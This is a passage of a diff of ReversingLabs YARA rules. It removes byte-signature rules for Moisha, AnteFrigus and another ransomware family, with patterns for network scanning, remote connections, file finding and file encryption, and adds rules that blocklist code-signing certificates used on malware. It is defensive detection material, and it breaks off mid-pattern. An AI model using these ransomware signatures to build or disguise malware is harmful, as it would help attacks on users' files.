?? ?? ?? DD 9D ?? ?? ?? ?? 8B - 55 ?? 33 C0 2B 42 ?? 8B 4D ?? 8B 51 ?? 8B 04 82 50 FF 15 ?? ?? ?? ?? DC AD ?? ?? ?? - ?? DC 0D ?? ?? ?? ?? DC 0D ?? ?? ?? ?? DC 0D ?? ?? ?? ?? DC 85 ?? ?? ?? ?? DD 5D ?? - C7 45 ?? ?? ?? ?? ?? DD 45 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 89 41 ?? C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 - } - $scan_network_p3 = { - C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? - ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? - ?? 52 8D 85 ?? ?? ?? ?? 50 8D 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E9 ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? - FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? - 8B 95 ?? ?? ?? ?? 8B 02 89 85 ?? ?? ?? ?? 8B 4D ?? 8B 11 8B 45 ?? 50 FF 92 ?? ?? ?? - ?? 50 8D 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 FF 15 - ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 8B 11 8B 85 ?? ?? ?? ?? 50 FF 52 ?? DB E2 89 85 ?? - ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8B 95 - ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? - ?? 8B 45 ?? 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8D 55 ?? 52 - FF 15 ?? ?? ?? ?? 50 8B 85 ?? ?? ?? ?? 8B 08 8B 95 ?? ?? ?? ?? 52 FF 51 ?? DB E2 89 - 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 - } - $scan_network_p4 = { - 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? - ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? - ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 - 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 8B 11 8B 45 ?? 50 FF 92 ?? ?? ?? ?? 50 8D 4D ?? 51 - FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8B 95 ?? ?? ?? ?? 8B 02 8B 8D ?? ?? ?? ?? - 51 FF 50 ?? DB E2 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ?? - 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? - C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 9B 68 ?? ?? ?? ?? EB ?? 8D - 4D ?? FF 15 ?? ?? ?? ?? 8D 4D ?? 51 8D 55 ?? 52 8D 45 ?? 50 6A ?? FF 15 ?? ?? ?? ?? - 83 C4 ?? 8D 4D ?? 51 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C3 8D 85 ?? ?? ?? - ?? 50 8D 8D ?? ?? ?? ?? 51 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? FF 15 ?? ?? ?? - ?? 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? FF 15 ?? ?? ?? ?? C3 8B 4D - ?? 8B 11 8B 45 ?? 50 FF 52 ?? 8B 4D ?? 66 8B 55 ?? 66 89 11 8B 45 ?? 8B 4D ?? 64 89 - 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C2 - } - condition: - uint16(0)==0x5A4D and ( all of ($scan_network_p*)) and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="33:b2:41:70:69:4c:a0:cf:4d:2b:df:4a:ad:f4:75:a3" and 1474934400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Moisha : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_3A9Bdec10E00E780316Baaebfe7A772C : INFO FILE { meta: - description = "Yara rule that detects Moisha ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c72f654f-955e-5ff6-ac91-19fbb858265c" - date = "2022-10-11" - modified = "2022-10-11" + id = "56f62454-84a1-5843-b2f4-fa84b37040f3" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.Moisha.yara#L1-L86" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "89cefbbb8ec722216721bb43eb14cc33fcd4671585051359a06b62236cbf3a6c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14076-L14092" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ea9bc11efd2969f6b7112338f2b084ea3551e072e46b1162bd47b08be549cdd4" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Moisha" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_p1 = { - 73 ?? ?? ?? ?? 0A 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 2B ?? 07 6F ?? ?? ?? ?? 0C 08 28 - ?? ?? ?? ?? 2D ?? 06 08 6F ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 2D ?? DE ?? 07 2C ?? 07 6F ?? - ?? ?? ?? DC DE ?? 26 DE ?? 06 2A - } - $find_files_p2 = { - 02 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 0A 06 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? - 0B 2B ?? 07 6F ?? ?? ?? ?? 0C 08 6F ?? ?? ?? ?? 0D 03 09 6F ?? ?? ?? ?? 04 2C ?? 04 09 - 6F ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 2D ?? DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC 06 6F ?? ?? - ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 03 04 - 28 ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? - ?? ?? ?? DC 02 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 03 11 ?? 6F ?? ?? ?? ?? 04 2C ?? 04 - 11 ?? 6F ?? ?? ?? ?? 2A - } - $find_files_p3 = { - 73 ?? ?? ?? ?? 0A 06 03 7D ?? ?? ?? ?? 06 04 7D ?? ?? ?? ?? 06 05 7D ?? ?? ?? ?? 02 28 - ?? ?? ?? ?? 39 ?? ?? ?? ?? 06 02 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 7B ?? - ?? ?? ?? 2C ?? 06 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 31 ?? 06 7B ?? ?? ?? ?? 2C ?? 06 FE - 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 07 17 6F ?? ?? ?? ?? 07 17 6F ?? ?? ?? - ?? 7E ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 07 6F ?? ?? ?? ?? DE ?? 26 DE ?? 02 28 ?? ?? ?? ?? - 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 2B ?? 12 ?? 28 ?? ?? ?? ?? 0D 09 6F ?? ?? ?? ?? 06 7B - ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 12 ?? 28 - ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 2A - } - $import_priv_key = { - 02 73 ?? ?? ?? ?? 13 ?? 11 ?? 73 ?? ?? ?? ?? 13 ?? 16 13 ?? 16 13 ?? 16 13 ?? 11 ?? 6F - ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 33 ?? 11 ?? 6F ?? ?? ?? ?? 26 2B ?? 11 ?? 20 ?? - ?? ?? ?? 33 ?? 11 ?? 6F ?? ?? ?? ?? 26 2B ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 11 ?? 6F - ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 2E ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 11 ?? 6F - ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 11 ?? 28 ?? ?? ?? ?? 13 - ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 0A 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? - 0B 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 0C 11 ?? 28 ?? ?? ?? ?? 13 ?? - 11 ?? 11 ?? 6F ?? ?? ?? ?? 0D 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 13 - ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 - ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? - ?? 13 ?? 12 ?? FE 15 ?? ?? ?? ?? 12 ?? 06 7D ?? ?? ?? ?? 12 ?? 07 7D ?? ?? ?? ?? 12 ?? - 08 7D ?? ?? ?? ?? 12 ?? 09 7D ?? ?? ?? ?? 12 ?? 11 ?? 7D ?? ?? ?? ?? 12 ?? 11 ?? 7D ?? - ?? ?? ?? 12 ?? 11 ?? 7D ?? ?? ?? ?? 12 ?? 11 ?? 7D ?? ?? ?? ?? 11 ?? 13 ?? DE ?? 11 ?? - 6F ?? ?? ?? ?? DC 11 ?? 2A - } - $encrypt_files = { - 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 0A 14 0B 14 0C 16 0D 20 ?? ?? ?? ?? 13 ?? 03 19 17 1D 28 - ?? ?? ?? ?? 0B 03 19 18 1D 28 ?? ?? ?? ?? 0C 02 7B ?? ?? ?? ?? 08 17 6F ?? ?? ?? ?? 13 - ?? 07 06 16 06 8E 69 6F ?? ?? ?? ?? 13 ?? 11 ?? 16 31 ?? 11 ?? 06 16 11 ?? 6F ?? ?? ?? - ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 04 11 ?? 6F ?? ?? ?? ?? 04 6F ?? ?? ?? ?? - 13 ?? 11 ?? 8E 69 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 08 08 6F ?? ?? ?? ?? 16 6F ?? ?? ?? - ?? 26 08 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 08 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 08 - 6F ?? ?? ?? ?? 17 0D DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC DE ?? 13 ?? DE ?? 07 2C - ?? 07 6F ?? ?? ?? ?? 08 2C ?? 08 6F ?? ?? ?? ?? 09 26 DC 2A - } - condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ($import_priv_key) and ($encrypt_files) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PLAN ALPHA LIMITED" and pe.signatures[i].serial=="3a:9b:de:c1:0e:00:e7:80:31:6b:aa:eb:fe:7a:77:2c" and 1556582400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Antefrigus : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_7Cad9C37F7Affa8F4D8229F97607E265 : INFO FILE { meta: - description = "Yara rule that detects AnteFrigus ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "903ac92c-1a4a-5645-92db-d00b3bfd6ada" - date = "2021-03-05" - modified = "2021-03-05" + id = "dae6b474-e4f0-5c73-b32e-d2680f508799" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.AnteFrigus.yara#L1-L210" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b84c01da0ee97a4eb8bf099c71094f994feb4c7185ad75b8b2ccda5eee283a92" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14094-L14110" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0f88989c64bece23e7eccf8022e038fdd9c360766de71268cf71616f74adc56c" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "AnteFrigus" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_p1 = { - 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 68 ?? ?? ?? ?? 8B D0 - 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 83 65 ?? ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? 8D 45 - ?? 51 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 33 C0 8D 7D - ?? AB AB AB 33 C0 89 45 ?? 89 45 ?? 89 45 ?? C6 45 ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? - 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? - 68 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 59 8B D0 C6 45 ?? ?? 8B 4A ?? 8B 7A ?? 2B - CF 39 4E ?? 76 ?? 8B 46 ?? 2B 46 ?? 3B C7 72 ?? 83 7A ?? ?? 72 ?? 8B 12 57 52 51 8B - CE E8 ?? ?? ?? ?? EB ?? 56 8B CA E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 85 ?? - ?? ?? ?? ?? 8D 45 ?? FF B5 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? - ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? - 83 7D ?? ?? 8D 4D ?? 8B 45 ?? 0F 43 4D ?? 8D 04 41 8D 4D ?? 0F 43 4D ?? 51 50 51 8D - 4D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 83 65 ?? ?? 8D 4D ?? 83 65 ?? ?? 50 E8 ?? - ?? ?? ?? C6 45 ?? ?? 8D 75 ?? 83 7D ?? ?? 8B 55 ?? 0F 43 75 ?? 85 D2 74 ?? 83 C9 ?? - 8D 42 ?? 3B C1 0F 42 C8 03 CE EB ?? 3B CE 74 ?? 49 80 39 ?? 75 ?? 2B CE EB ?? 83 C9 - ?? 83 F9 ?? 0F 84 ?? ?? ?? ?? 83 65 ?? ?? 8D 71 ?? C7 45 ?? ?? ?? ?? ?? C6 45 - } - $find_files_p2 = { - 3B D6 0F 82 ?? ?? ?? ?? 2B D6 8D 45 ?? 83 C9 ?? 83 FA ?? 0F 42 CA 83 7D ?? ?? 51 0F - 43 45 ?? 8D 4D ?? 03 C6 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 8D 45 ?? 50 83 - 61 ?? ?? 83 61 ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? - E8 ?? ?? ?? ?? 51 51 8D 45 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? - 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? - E8 ?? ?? ?? ?? BF ?? ?? ?? ?? 8B 70 ?? 03 30 3B F7 7D ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D - 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 3B F7 7D ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? - ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 45 ?? 8D 4D ?? 51 3B 45 ?? 74 ?? 8B C8 E8 ?? ?? - ?? ?? 83 45 ?? ?? EB ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? - C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? - ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 7D ?? 8B 75 ?? 6A ?? 5B 3B F7 74 ?? 56 E8 ?? ?? ?? - ?? 03 F3 59 3B F7 75 ?? 8B 7D ?? 8B 75 ?? 85 F6 74 ?? 3B F7 74 ?? 8B CE E8 ?? ?? ?? - ?? 03 F3 3B F7 75 ?? 8B 75 ?? 8B 45 ?? 2B C6 99 F7 FB 6B C0 ?? 50 56 E8 ?? ?? ?? ?? - 59 59 8D 4D ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E8 - } - $remote_connection_p1 = { - 55 8D AC 24 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 - 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 85 ?? ?? ?? ?? 53 56 57 50 8D 45 ?? 64 A3 - ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 BA ?? ?? ?? ?? 8D 8D ?? ?? ?? - ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? - ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 - ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? - ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D - 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? - ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? - ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 0F 43 - 8D ?? ?? ?? ?? 03 F9 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? - ?? ?? 0F 43 B5 ?? ?? ?? ?? 33 C0 66 89 85 ?? ?? ?? ?? 33 DB 8B C7 89 9D - } - $remote_connection_p2 = { - 2B C6 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? C6 45 ?? ?? EB ?? 66 0F BE 06 8D - 8D ?? ?? ?? ?? 0F B7 C0 50 E8 ?? ?? ?? ?? 46 3B F7 75 ?? 53 53 53 53 68 ?? ?? ?? ?? - C6 45 ?? ?? 88 5D ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A ?? 33 C0 50 - 6A ?? 50 50 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 89 45 ?? 85 - C0 74 ?? 6A ?? 68 ?? ?? ?? ?? 33 C9 51 51 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 - ?? ?? ?? ?? 8B F0 85 F6 74 ?? 33 C0 50 50 50 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 - ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? - 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 56 FF D7 FF 75 ?? FF D7 53 FF - D7 80 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 8D ?? ?? ?? ?? 33 CD E8 ?? ?? ?? ?? 81 - C5 ?? ?? ?? ?? C9 C3 8B 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 73 ?? - 8D 95 ?? ?? ?? ?? C6 84 05 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 - ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? - E9 ?? ?? ?? ?? E8 - } - $encrypt_files_p1 = { - 66 39 03 0F 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 33 C0 8D 8D ?? - ?? ?? ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? - ?? 8D 95 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 0F 43 95 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? - ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D - ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 5B C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 39 9D ?? ?? ?? ?? - 8B 85 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 8D 04 41 8D 8D ?? ?? ?? ?? 0F 43 8D ?? ?? ?? - ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 - 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 BA ?? ?? ?? ?? 8D - 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? - 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? - ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D - } - $encrypt_files_p2 = { - 8D ?? ?? ?? ?? 83 C4 ?? 3B C8 74 ?? 33 C9 88 4D ?? 8D 8D ?? ?? ?? ?? FF 75 ?? 50 E8 - ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? - ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 E8 - ?? ?? ?? ?? 56 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 33 C0 59 89 85 ?? - ?? ?? ?? 89 8D ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 88 - 85 ?? ?? ?? ?? BF ?? ?? ?? ?? C6 45 ?? ?? 57 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 8D 4D - ?? E8 ?? ?? ?? ?? 33 C0 C6 45 ?? ?? 57 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D - 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 59 99 F7 F9 8D 4D ?? - 52 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 59 99 F7 F9 8D 8D ?? ?? ?? ?? 52 E8 ?? ?? ?? - ?? 83 EB ?? 75 ?? 8D 95 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 8D - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? - E8 ?? ?? ?? ?? 57 8D 85 ?? ?? ?? 